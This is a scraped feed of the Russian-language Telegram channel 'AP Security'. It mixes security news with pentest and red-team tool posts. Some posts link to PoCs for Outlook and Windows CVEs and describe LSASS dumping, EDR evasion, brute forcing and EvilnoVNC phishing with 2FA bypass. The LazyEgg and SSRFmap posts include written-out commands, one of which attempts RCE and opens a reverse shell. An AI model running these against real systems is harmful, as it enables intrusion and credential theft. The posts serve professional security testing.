ap_security | Неотсортированное

Telegram-канал ap_security - AP Security

3455

Лаборатория инновационных технологий и кибербезопасности. ( Laboratory of innovation technologies and cybersecurity ) Новости, события, мероприятия, технические обзоры Контактная информация: @ap_security_admin По вопросам сотрудничества: @P1N_C0DE

Подписаться на канал

AP Security

#infosec

Tickler: пропуск иранских шпионов к секретам США и ОАЭ


Peach Sandstorm атакуют нефтегаз и спутники.

Согласно отчету корпорации, хакеры из Peach Sandstorm применяют этот многоступенчатый вредонос начиная с апреля 2024 года. Программа собирает различную сетевую информацию с зараженных машин и отправляет её на командные сервера злоумышленников.

Чтобы защитить свои системы от деятельности Peach Sandstorm, эксперты рекомендуют регулярно менять пароли учетных записей, подвергшихся атакам, отозвать сессионные cookie, а также, если у скомпрометированной учетной записи были привилегии системного уровня, провести дополнительный анализ.

Подробнее читайте в следующей статье.

Читать полностью…

AP Security

#infosec

☎️ Мошенники активизировались перед Днем знаний

Мошенники активно эксплуатируют подготовку детей к новому учебному году. Они заманивают в фальшивые интернет-магазины, привлекая всевозможными скидками и конкурсами.

📊 Объем российского рынка безопасной разработки ПО может достичь 60 млрд рублей в 2027 году

По усредненной оценке ЦСР, объем российского рынка безопасной разработки по итогам 2022 года составил около 8,25 млрд рублей, а в 2023 году достиг 9,84-12,32 млрд рублей. Аналитики прогнозируют стабильный рост сегмента в будущем: по самым осторожным оценкам, к 2027 году его объем приблизится к 17,75 млрд рублей, увеличившись почти в два раза, а по самым оптимистичным - 60 млрд рублей (рост в 7 раз относительно 2022 года).

Читать полностью…

AP Security

#tools #pentest

⚙️ Wi-Fi аудит

Несмотря на большое количество инструментов для аудита беспроводных сетей, предлагаем дополнительно Вашему вниманию Freeway, обеспечивающий и деаутентификацию, Channel Hopper, Ewil Twin атаки.

Также прикладываем статью с другими существующими инструментами по данной теме.

Читать полностью…

AP Security

#pentest

📱 Сохраненные учетные данные веб-браузера

Организации, использующие Microsoft Edge или Google Chrome для хранения учетных данных своих пользователей, уязвимы из-за злоупотребления API CryptUnprotectData (T1555.003)

О том, как это можно использовать на проектах, в следующей статье.

Приятного прочтения 📔

Читать полностью…

AP Security

#application

📱 Android Jetpack Navigation

Некоторое время назад коллега автора статьи обнаружил интересную уязвимость в библиотеке Jetpack Navigation, которая позволяет открыть любой экран приложения, обойдя существующие ограничения для компонентов, которые не экспортируются и, следовательно, недоступны для других приложений. Проблема кроется в неявном механизме обработки глубоких ссылок, с которым может взаимодействовать любое приложение на устройстве.


Каждому Android-разработчику во время разработки своего приложения необходимо сталкиваться с созданием пользовательского интерфейса. Для этого существует несколько способов, и один из них - Jetpack Compose UI.

Читать полностью…

AP Security

🪲Wayback Machine как средство для багхантинга 🪲

Наверное, многие слышали про сервис Wayback Machine https://archive.org/ , который с помощью поисковых роботов делает снапшоты разнообразных сайтов. 🌐

Но чем же данный сервис может помочь при багхантинге ❓

❗️Во-первых, данный сервис может помочь собрать , так называемые, low-hanging fruits.
Был случай, когда был Wayback Machine показал эндпоинт типа http://example/api/profile/+7хххххххххх, сразу содержащий уязвимость типа IDOR.

❗️Во-вторых, он позволяет найти устаревшие параметры, которые разработчики убрать забыли ,и в явную на проде не используются, но они все также могут содержаться уязвимости, что расширяет скоуп.

❗️В-третьих, сервис помогает найти дополнительные эндпоинты API , которые через обычный фронт бывает найти не так просто.

❗️ В дополнение, Wayback Machine имеет собственный API, позволяющие писать автоматизирующие скрипты https://archive.org/help/wayback_api.php. Либо же можно использовать готовые решения на гитхабе, например https://github.com/tomnomnom/waybackurls/

Читать полностью…

AP Security

#soc

⚡️Реагирование на инциденты

Короткий мануал с этапами реагирования на инциденты с наглядным разбором практических кейсов по ним.

Приятного прочтения📔

Читать полностью…

AP Security

https://github.com/cyberpunk-afanx/portswigger_exploits/tree/master

Читать полностью…

AP Security

#infosec

🌟Руководство OpenAI разделилось во мнениях относительно собственной технологии водяного знака ИИ

У OpenAI есть инструмент для автоматического нанесения водяных знаков на контент, созданный искусственным интеллектом, но руководство компании разделилось во мнении, стоит ли выпускать его в открытый доступ.

Инструмент якобы готов к выпуску, но проект уже два года находится во внутренней дискуссии.

Опрос, проведенный компанией в апреле 2023 года среди постоянных пользователей ChatGPT, показал, что почти треть из них отказались бы от этой технологии, главным образом потому, что она может обнаружить списывание и плагиат.

⚡️Уязвимости 5G позволяют следить за владельцами мобильных устройств

Исследователи из Университета Пенсильвании на конференции Black Hat, которая проходит в Лас-Вегасе, продемонстрировали метод слежки за владельцами мобильных устройств с помощью baseband-брешей в 5G.

Используя кастомный инструмент 5GBaseChecker, специалисты выявили уязвимости в базовой полосе, которые применяют 5G-модемы таких производителей, как Samsung, MediaTek и Qualcomm (используются в телефонах Google, OPPO, OnePlus, Motorola и Samsung).

💰 Атака напрокат: в даркнете стоимость готовых ботнетов для массовых атак начинается от 99 долларов США

Эксперты Kaspersky Digital Footprint Intelligence проанализировали объявления о предоставлении услуг, связанных с эксплуатацией ботнетов в даркнете и специализированных Telegram-каналах.

Для создания ботнетов могут использоваться уязвимые пользовательские и корпоративные гаджеты, например со слабыми паролями: от умных камер до продвинутых промышленных устройств. Аналитики «Лаборатории Касперского» в первом полугодии 2024 года зафиксировали рост более чем в два раза числа заражённых IoT-устройств в Росcии по сравнению с аналогичным периодом в прошлом году.

Такие инструменты могут обладать индивидуальными настройками и различаться по способам заражения, типу используемого вредоносного ПО, инфраструктуре, методам обхода обнаружения. Их разрабатывают для продажи на теневом рынке, а стоимость зависит от качества. В объявлениях за 2024 год, которые проанализировали эксперты, самая низкая цена составила 99 долларов США, а самая высокая — 10 тысяч долларов США. Ботнеты также можно взять в аренду: стоимость такой услуги варьируется от 30 до 4 800 долларов США в месяц.

Читать полностью…

AP Security

#tools #pentest

📎 PoC CVE-2024-21338

Уязвимость CVE-2024-21338 была обнаружена специалистами Avast в драйвере appid.sys Windows AppLocker, о чем они сообщили Microsoft в августе прошлого года, предупредив, что уязвимость уже активно эксплуатируют злоумышленники.

🟡Подробнее об этой уязвимости написано в статье на Хакер.

Читать полностью…

AP Security

Теперь о текущем
Делаюсь своим опытом и скиллом написания скриптов для gdb
Признаюсь,братцы,вам: gdb это не страшная бабка из астрала, а очень добрый друг Каспер, который может облегчить вам жизнь
Ни раз сталкивался с тем, что нужно было что-то автоматизировать в отладчиках, работая с фаззерами
Поэтому берите и юзайте
Встречайте первую статью - Признаюсь, братцы, вам гдбшку я любил GDB Scripting Linux and Windows

Читать полностью…

AP Security

#infosec

🐶 Новый PyPI-пакет Zlibxjson крадет данные Discord и браузеров

Вредоносный пакет под названием zlibxjson версии 8.2 был отмечен системой обнаружения вредоносного ПО, управляемой искусственным интеллектом компании Fortinet.

Было замечено, что пакет тайно загружает несколько файлов, включая исполняемый файл (.exe) с пакетом PyInstaller, который при распаковке содержит несколько файлов Python и DLL.

Среди них особенно опасными оказались три Python-скрипта - Discord_token_grabber.py, get_cookies.py и password_grabber.py.


📱 Windows-версия WhatsApp позволяет запускать Python и PHP без предупреждения

Проблема в безопасности последней версии WhatsApp (принадлежит компании Meta, признанной экстремистской и запрещенной в России) для Windows позволяет отправлять Python- и PHP-вложения, которые будут выполняться на устройстве пользователя без каких-либо предупреждений.

Для успешной эксплуатации этого бага в системе жертвы должен быть установлен Python. Это условие может сузить список потенциальных жертв до разработчиков софта.

🔔 Власти Израиля изъяли документы и компьютеры у создателей шпионской программы Pegasus, чтобы они не попали в США

Утечка из Министерства юстиции Израиля указывает на то, что правительство страны изъяло документы и компьютеры у компании NSO Group, чтобы предотвратить передачу потенциально компрометирующих материалов в рамках судебного процесса в США. Об этом в конце июля 2024 г. сообщило The Guardian.

По информации The Guardian, ставки запредельно высоки, поскольку судебное разбирательство может раскрыть исключительно секретную информацию, касающуюся шпионского программного обеспечения (ПО) под названием Pegasus, одного из самых известных хакерских инструментов в мире.

Читать полностью…

AP Security

📱 Кто стучится в почту? Social engineering 2024

PDF или SVG smuggling, PDF polyglot, PDF luring в докладе Константина Полишина об актуальных методах проведения фишинга в рамках Red team проектов являются дополнением к материалам PHD12.

С первой частью составного доклада по этой теме можно ознакомиться по следующей ссылке. В прошлогоднем выпуске PT также расписан материал первой части.

Приятного просмотра🌟

Читать полностью…

AP Security

#pentest

📱 PoC Microsoft Outlook Remote Code Execution CVE-2024-21413

13 февраля 2024 года компания Microsoft выпустила предупреждение для своих пользователей о критической уязвимости в пакете Office, которая позволяет злоумышленникам удаленно выполнять вредоносный код.

Уязвимость затрагивает несколько продуктов Microsoft Office, включая приложения 365 Enterprise, Office 2016 и 2019, а также Office LTSC 2021.

➡️ PoC на данную уязвимость: https://blog.injectexp.dev/outlook-cve-2024-21413-for-rce-hacking-through-a-letter/07/rce/

В строке 27 необходимо указать путь к файлу на вашем сервере. В описании к скрипту имеются комментарии.

Об уязвимости: https://habr.com/ru/articles/798759/

Читать полностью…

AP Security

#byapsecurity

🐦 Студенческий опыт Standoff — на шаг ближе к вершинам 🥇

Привет!!! Не так давно стажёры лаборатории инновационных технологий и кибербезопасности нашей компании принимали участие во Всероссийской студенческой кибербитве. Изюминкой тех соревнований являлся полигон Standoff, предоставленный студентам для получения первичных навыков участия в этих захватывающих кибербитвах.

⚡️ 8-10 сентября эти захватывающие соревнования пройдут вновь. Вся информация представлена по ссылке.

Надеемся, что печатный труд ребят ( за что им отдельная благодарность) поможет Вам раскрыть потенциал и реализовать свои цели - принять участие в сражениях Государства F в роли атакующих или защитников🔥

Приятного прочтения ✈️

Читать полностью…

AP Security

#pentest

Kraken - All-in-One Toolkit for BruteForce Attacks

Универсальный инструмент для реализации брутфорса разных служб и сервисов в одной коробке.

Читать полностью…

AP Security

#soc

📘 The Threat Hunter Playbook

Все документы по обнаружению в этом проекте соответствуют структуре MITRE ATT & CK, классифицирующей поведение атакующего после компрометации, и доступны в виде интерактивных записных книжек.

Читать полностью…

AP Security

#soc

🔹 SOAR Playbook

SOAR (Система оркестрации, автоматизации и реагирования на инциденты безопасности) - это набор служб и инструментов, которые автоматизируют процессы предотвращения кибератак и противодействия им.

Автоматизация достигается за счет объединения интегрированных инструментов, определения способов выполнения задач и разработки плана реагирования на инциденты, отвечающего потребностям организации.

Читать полностью…

AP Security

#tools #pentest

🖥 Keywa7

Инструмент, который обходит правила на уровне приложений и позволяет подключаться к интересующему IP, порту и приложению.

Читать полностью…

AP Security

#pentest

🔶 Дамп LSASS

В этом коротком видео автор с помощью утилиты на Go приводит пример возможного обхода EDR и последующего дампа LSASS.

Читать полностью…

AP Security

#infosec

⬇️ Microsoft закрыла 9 zero-days в обновлении прошедшего вторника.

Шесть из 9 уязвимостей использовались в дикой природе.

Среди них - ошибка обхода функции безопасности Windows Mark of the Web (MotW) (CVE-2024-38213), которая аналогична обходу SmartScreen, опубликованному в феврале.

«Злоумышленник, убедивший пользователя открыть вредоносный файл, может обойти SmartScreen, который обычно предупреждает пользователя о загруженных из Интернета файлах, которые Windows в противном случае пометила бы MotW», - пояснил ведущий инженер-программист Rapid7 Адам Барнетт (Adam Barnett).

👋Miro заявила о прекращении работы аккаунтов из России и Республики Беларусь 12 сентября

В ответ на запрос пользовательницы сервиса в техподдержке ответили, что пользователи из РФ и РБ смогут пользоваться досками, если их аккаунт зарегистрирован в других странах.

🌟 В российских ИТ-компаниях взрывной спрос на программистов со знанием китайского языка

За семь месяцев число вакансий с таким критерием на рекрутинговых сайтах год к году выросло на 31–65%, преимущественно ищут программистов. По мнению экспертов, это связано с появлением ряда азиатских приложений на российском рынке, а также переходом на китайское оборудование для производства электроники. ИТ-компании также отмечают спрос на ИТ-специалистов и c корейским языком.

Читать полностью…

AP Security

#tools #pentest

🪆 TrickDump ( lsass dump)

TrickDump генерирует дамп процесса lsass без создания файла Minidump, вместо этого генерируя 3 JSON и 1 ZIP файл с дампами областей памяти. В три шага:

🟥Получение информации об ОС с помощью RtlGetVersion.

🟥Получение привилегии SeDebugPrivilege с помощью NtOpenProcessToken и NtAdjustPrivilegeToken, открытие хэндла с помощью NtGetNextProcess и NtQueryInformationProcess, а затем получение информации о модулях с помощью NtQueryInformationProcess и NtReadVirtualMemory.

🟥Получение привилегии SeDebugPrivilege, открытие хэндла, а затем сбор информации и дампа областей памяти с помощью функций NtQueryVirtualMemory и NtReadVirtualMemory.

Узнать о других подходах и нюансах работы с процессом lsaas можно в следующей статье.

Читать полностью…

AP Security

🔠🔠 🔠🔠🔠🔠🔠

Недавно на github'е наткнулся на интересную утилиту LazyEgg, позволяющую добывать ссылки, фото, URL'ы, айпишники, креды, ключи по целевому URL, а также искать и анализировать js файлы по сигнатурам
https://github.com/schooldropout1337/lazyegg

▶️ Установить утилиту

git clone https://github.com/schooldropout1337/lazyegg.git


▶️ Обычный скан по целевому URL
python lazyegg.py http://localhost:8080


▶️ Для поиска скрытых js файлов, можем воспользоваться следующей командой
python lazyegg.py http://localhost:8080/js --js_scan --w wordlist.txt


▶️ LazyEgg позволяет сканить и отдельные js файлы на наличие сигнатур, для этого нужно создать дополнительный файл с URL' ами js файлов
cat jsurls.txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg.py "{}" --js_urls --domains --ips --leaked_creds'


▶️ Можно воспользоваться скриптом, использующий вывод утилиты waybackurls для дальнейшего скана
waybackurls vulnweb.com | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg.py "{}" --js_urls --domains --ips' > jsurls.log && cat jsurls.log | grep '\.' | sort -u


▶️ Также LazyEgg имеет свое расширение для Chrome, чтобы его поставить, которое находится в архиве le-jsurl.zip репозитория

Читать полностью…

AP Security

#forensics

📡 Kdrill

Инструмент на Python для проверки руткитов в ядре Windows.

Kdrill получает доступ к физической памяти и декодирует внутренние структуры ОС, чтобы исследовать их и проверить целостность.

Читать полностью…

AP Security

#osint

🔍 Telegram-OSINT

Отдельный репозиторий для поиска информации в Telegram, содержащий огромное количество ресурсов.

⚡️Начинающим специалистам стоит не забывать про OPSEC при работе с ботами, требующими номер и собирающими информацию о Вашем аккаунте.

Читать полностью…

AP Security

Автоматизация с помощью SSRFmap 👁‍🗨

Проверенный временем, инструмент для автоматизации SSRF атак, поддерживающий большое количество модулей, кодирование нагрузки для bypass'а WAF'ов, создание reverse shell соединения

☄️ https://github.com/swisskyrepo/SSRFmap ☄️

Ставим на хост

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py


Поднимаем докер
git clone https://github.com/swisskyrepo/SSRFmap
docker build --no-cache -t ssrfmap .
docker run -it ssrfmap ssrfmap.py [OPTIONS]
docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py


Пример команды, где опция -r —> запрос, сохраненный из Burp Suite, -p —> тестируемый параметр, -m —> используемые модули
python ssrfmap.py -r request.txt -p url -m readfiles,portscan


Используем модуль redis, который сразу пробует проэксплуатировать RCE, где параметры LHOST и LPORT служат для создания reverse shell
python ssrfmap.py -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242


И в конце небольшой Cheat Sheet по SSRF 💫

Читать полностью…

AP Security

🎙 До начала торжественной церемонии остаётся 9 часов

Именно сегодня, в 19:00 ⚡️ , стартует трансляция награждения участников премии Pentest Award.

В этом году лаборатория инновационных технологий и кибербезопасности компании AP Security принимала участие в нескольких номинациях.

Данное мероприятие является праздником для энтузиастов информационной безопасности и позволяет раскрыть в себе творческий и профессиональный потенциал, оценить свои силы, познакомиться с единомышленниками и вдохновиться на что-то новое и интересное.

Мы также в онлайне будем радоваться успехам всех финалистов данной премии и поздравлять своих коллег с попадаем на торжественную церемонию.

🐦 Всем желаем интересных проектов, вдохновения и удачи во всём, к чему лежит душа и делает мир кибербезопаности более насыщенным и интересным!

Читать полностью…

AP Security

#pentest #redteam

⬇️ Фишинговая платформа EvilnoVNC

Наверняка не раз Вы слышали об опыте использования опенсорсного продукта Gophish. В дополнение к этому базовому инструменту прикладываем EvilnoVNC.

EvilnoVNC - это готовая к работе фишинговая платформа.

В отличие от других фишинговых технологий, EvilnoVNC позволяет обойти 2FA, используя реальный браузер через noVNC-соединение.

Кроме того, этот инструмент позволяет в режиме реального времени видеть все действия жертвы, осуществлять доступ к загруженным файлам и изучать весь профиль браузера, включая куки, сохраненные пароли, историю просмотров и многое другое.

🔔 Также прикладываем свежий обзор на существующие утилиты для осуществления фишинговой рассылки в рамках Ваших проектов по аудиту безопасности.

Читать полностью…

AP Security

#osint

🔍Удивительный OSINT

Этот насыщенный список инструментов создан помочь всем, кто занимается Cyber Threat Intellience (CTI), охотой за угрозами или осинтом. Ресурс полезен от начинающих специалистов до продвинутых.

Читать полностью…

AP Security

#realcase

🖥 Что должно измениться, чтобы утечек стало меньше

Ассоциация больших данных (ее членами являются «Яндекс», VK, Сбербанк, Газпромбанк, Тинькофф Банк, Россельхозбанк, «Мегафон», «Ростелеком», Qiwi, билайн, МТС, фонд «Сколково», Аналитический центр при правительстве Российской Федерации, ВТБ, Avito, Центр стратегических разработок) предложила депутатам уточнить текст поправок в Уголовный кодекс, ужесточающих наказание за утечки данных и устанавливающих для нарушителей даже уголовную ответственность за сбор или хранение незаконно полученных персональных данных. Об этом говорится в письме ассоциации от 26 декабря 2023 года в комитет Госдумы по госстроительству и законодательству.

🔩 Данная дискуссия широко описывает проблемы регулирования ответственности за утечки персональных данных, от рисков для бизнеса до юридических ограничений. Обсуждается предложенный АБД стандарт в области защиты персональных данных, опробованный крупными игроками рынка.

Приятного просмотра 🌟

Читать полностью…
Подписаться на канал